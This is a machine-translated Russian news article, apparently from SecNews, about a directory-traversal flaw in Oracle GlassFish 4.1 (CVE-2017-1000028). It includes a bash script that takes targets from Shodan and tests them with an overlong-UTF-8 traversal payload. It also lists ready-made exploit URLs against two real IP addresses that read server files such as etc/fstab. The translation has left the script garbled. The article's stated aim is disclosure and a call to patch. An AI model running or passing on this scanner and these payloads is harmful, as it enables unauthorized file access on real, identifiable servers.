Среда, 1 апреля, 01:47
дома Исследования GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

Уязвимость в GlassFish Oracle: Исследователь безопасности Димитрис Руссис анализирует нас как уязвимость к известным Сервер приложений Его GlassFish Oracle признан CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) в настоящее время предоставляет данные тысячам серверов по всему миру.

Oracle GlassFish

Его эксплуатация вакуум безопасности позволяет читать тип атаки по каталогам всех файлов сервера, на которых установлен сервер приложений.

В анализе, проведенном исследователем, они сначала используют образцы серверов 300 через поисковую систему shodan, на которой установлена ​​версия GlashFish в версии 4.1.

Затем с помощью автоматизированного сценария, созданного исследователем, они проверяют, какой из серверов действительно существует. уязвимость.

#! / bin / bash # Получить 300 результатов от поисковой системы shodan - shoitan search --limit 300 --fields ip_str Порт GlassFish 4.1: 4848> servers_ip.txt # Сортировать IP cat Servers_ip.txt | сортировать -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Удалить все пустые места sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Удалить временное Файлы rm servers_ip.txt rm servers_sort.txt # Список серверов input = "servers.txt" # проверить сервер на уязвимость, в то время как IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Соединение установлено! Сервер уязвим" #Сохранить результат в уязвимый_servers.txt echo "$ url" >> уязвимый_сервер.txt еще эхо "- Соединение не удалось! Сервер не уязвим" fi done < "$ input"

Серверы

Конечным результатом скрипта является создание файла, содержащего ссылки (URL-адреса) немедленно использовать уязвимость.

Просматривая ссылки, включенные в файл браузер мы можем видеть все файлы в / корне Сервера.

Иллюстрация:

Windows сервер

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux сервер

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Серверы GlassFish Oracle

Теперь мы можем получить доступ к любому файлу, который хотим на сервере, добавив путь к файлу в конце URL-адреса.

Например,

/ и т.д./ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

/ Корень

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

Вышеупомянутое исследование демонстрирует, с одной стороны, что уязвимость может привести к раскрытию данных в широком масштабе по всему миру, а с другой стороны, необходимость немедленной реализации данных. обновления программного обеспечения Системными администраторами.

Редакция SecNews искренне благодарит исследователя Димитриоса Руссиса за достоверную и своевременную информацию.

* Димитрис Руссис - сотрудник Лаборатории безопасности информационных систем Эгейского университета.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

ОСТАВИТЬ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

LIVE NEWS

Microsoft Edge - Password Monitor: оповещение при краже ваших паролей

Microsoft Edge представляет новый сервис под названием «Password Monitor». Эта служба уведомит ...

Face ID: как использовать его во время ношения маски для лица

Apple Face ID отлично подходит для распознавания лиц благодаря своей системе True Depth, которая ...

Canonical: новые инструменты и поддержка Ubuntu Linux для Raspberry Pi

С выпуском Ubuntu 19.10 компания Canonical объявила об официальной схеме для одноплатных компьютеров Raspberry Pi. Raspberry Pi не поддерживает ...

Работа на дому: избежать этих 9 ошибок

С распространением Covid-19 большая часть населения предпочитает работать из дома. Работать из дома нужно ...

Форд построит 50,000 респираторов в ближайшие 100 дней

В понедельник Ford заявил, что построит 50.000 100 респираторов в течение 20 дней, начиная с XNUMX апреля до ...

«Заражение»: главные герои фильма рассказывают о COVID-19!

Главные герои фильма «Заражение» сотрудничали с учеными из Школы общественного здравоохранения Колумбийского университета, участвуя в объявлениях службы здравоохранения о ...

Бесплатный доступ к облаку на квантовых компьютерах D-Wave

Канадская компания Quantum Computer D-Wave объявила о том, что она предоставляет бесплатный доступ людям, вовлеченным в ...

Airbnb: он выделяет 250 миллионов долларов своим хозяевам на коронации

Airbnb объявил, что потратит 250 миллионов долларов на поддержку своих хозяев по всему миру, ...

ФБР предупреждает: угонщики вторгаются на ваши встречи Zoom

ФБР сегодня предупредило об угонщиках, которые участвовали в видео встречах в Zoom, используемых для онлайн-уроков и деловых встреч, с ...

Европа Коронавирус: в конце не было никаких серьезных проблем с перегрузкой в ​​Интернете

BEREC, европейский регулятор телекоммуникаций, заявил сегодня, что с момента его создания ...